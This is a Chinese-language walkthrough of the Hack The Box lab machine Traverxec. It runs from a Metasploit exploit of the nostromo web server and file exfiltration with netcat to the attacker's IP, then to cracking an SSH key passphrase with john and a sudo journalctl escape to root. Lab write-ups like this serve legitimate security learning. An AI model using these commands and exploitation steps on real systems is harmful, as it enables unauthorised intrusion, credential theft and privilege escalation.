参考资料:https://whale3070.github.io/training/2019/01/07/x/
10.10.10.165
22 /tcp open ssh OpenSSH 7.9 p1 Debian 10 +deb10u1 (protocol 2.0 ) | ssh-hostkey: | 2048 aa: 99 :a8 : 16 : 68 :cd : 41 :cc :f9 : 6 c: 84 : 01:c7 : 59 : 09: 5 c (RSA) | 256 93 :dd : 1 a: 23 :ee :d7 : 1 f: 08: 6 b: 58 : 47 : 09: 73 :a3 : 88 :cc (ECDSA) |_ 256 9 d: d6: 62 : 1 e: 7 a: fb: 8 f: 56 : 92 :e6 : 37 :f1 : 10 :db : 9 b: ce (ED25519)80 /tcp open http nostromo 1.9 .6 |_http-server-header: nostromo 1.9 .6 |_http-title: TRAVERXEC Service Info: OS: Linux; CPE: cpe: /o: linux: linux_kernel
web searchsploit nostromo
nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user -supplied data. An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges . nostromo versions prior to 1.9 .4 are affected.
msfconsole
search nostromouse 0set RHOSTS 10.10.10.165set LHOST 10.10.14.8run
得到一个www-data权限的shell
cat /etc/passwd | grep home david:x:1000:1000:david,,,:/home/david:/bin/bash
python -c 'import pty; pty.spawn("/bin/bash" )'
不尝试内核漏洞提权 uname -aLinux traverxec 4 .19 .0 -6 -amd64 #1 SMP Debian 4 .19 .67 -2 +deb10 u1 (2019 -09 -20 ) x86 _64 GNU/Linuxwhereis gcc
没有编译器,故不尝试内核漏洞提权。
wget http:// 10.10 .14.4 :8000 /linux-exploit-suggester.sh -P / tmp chmod +x /tmp/ linux-exploit-suggester.sh cd /tmp;./ linux-exploit-suggester.sh Possible Exploits: [+] [CVE-2009 -1185 ] udev 2 Details: https:// www.exploit-db.com/exploits/ 8478 / Download URL: https:// www.exploit-db.com/download/ 8478 Comments: SSH access to non privileged user is needed. Version<1.4 .1 vulnerable but distros use own versioning scheme. Manual verification needed
查找机密文件 find / -name “index.html” 2>/dev/null 找到web目录,查看是否有config文件 /var/nostromo/htdocs/index.html
find / -name “*rsa” 2>/dev/null 没找到
find / -name “ssh “ 2>/dev/null
find / -name “backup*” 2>/dev/null
cd /var/nostromo/conf;cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
cd /homels -aldrwx --x--x 5 david david 4096 Oct 25 17 :02 david
其他用户只有可执行权限,没有可读权限
cd /var/nostromo/conf;cat nhttpd.conf
homedirs /home homedirs_public public_www
从这里得知,/home/david可能有public_www的目录
cd /home/ david/public_www;ls -al cd /home/ david/public_www/ protected -file -area;ls -al download backup-ssh-identity-files.tgz backup.tgz
不能用download命令,只有meterpreter才可以使用download进行文件下载。
kali主动连接目标机器,失败 nc -lnvp 8888 < backup-ssh-identity-files.tgz 端口不能小于1024
nc 10.10.10.165 8888 -w 10 > backup-ssh-identity-files.tgz
目标机器主动连接kali,成功 kali: nc -lnvp 8888 > backup-ssh-identity-files.tgz 目标机器:nc 10.10.14.8 8888 -w 10 < backup-ssh-identity-files.tgz
解压 gunzip backup-ssh-identity-files.tgz 解压后,发现/home/david目录下有authorized_keys id_rsa id_rsa.pub
密码破解 john –wordlist=rockyou.txt whatpass.txt
Warning : detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding : UTF-8 Loaded 1 password hash (md5crypt, crypt(3 ) $1 $ (and variants) [MD5 128 /128 AVX 4 x3]) Press 'q' or Ctrl-C to abort , almost any other key for status Nowonly4me (?)1 g 0 :00 :04 :04 DONE (2019 -12 -30 15 :08 ) 0.004088 g/s 43248 p/s 43248 c/s 43248 C/s Noxema..Nowhere Use the "--show" option to display all of the cracked passwords reliablySession completed
加密格式为md5crypt-long,尝试切换用户,失败 su david/Nowonly4me
su root/Nowonly4me 失败
ssh登陆 ssh david@10.10.10.165 -i id_rsa
输入密码Nowonly4me,失败
locate ssh2johncd /usr/share/johnpython ssh2john.py
运行后提示了用法
python ssh2john.py /root/ Documents/target/ 165 /home/ david/.ssh/i d_rsa > /tmp/ out.txt cat /tmp/ out.txt john /tmp/ out.txt --wordlist=/usr/ share/wordlists/ rockyou.txt
得出了id_rsa对应的密码
提权 参考资料:https://gtfobins.github.io/gtfobins/journalctl/
journalctl 用来查询 systemd-journald 服务收集到的日志。 再次尝试ssh登陆,ssh david@10.10.10.165 -i id_rsa
,输入密码,登陆成功。
cd /home/ david/bin;ls cat *.conf/usr/ bin/sudo /u sr/bin/ journalctl -n5 -unostromo.service !/bin/ bash
总结 本次学到了两个知识点:
locate ssh2john
python ssh2john.py id_rsa > out .txt john out .txt
可以在有id_rsa私钥的情况下,爆破ssh密码
通过二进制可执行程序的提权方式gtfobins ,下次再开一篇讲解。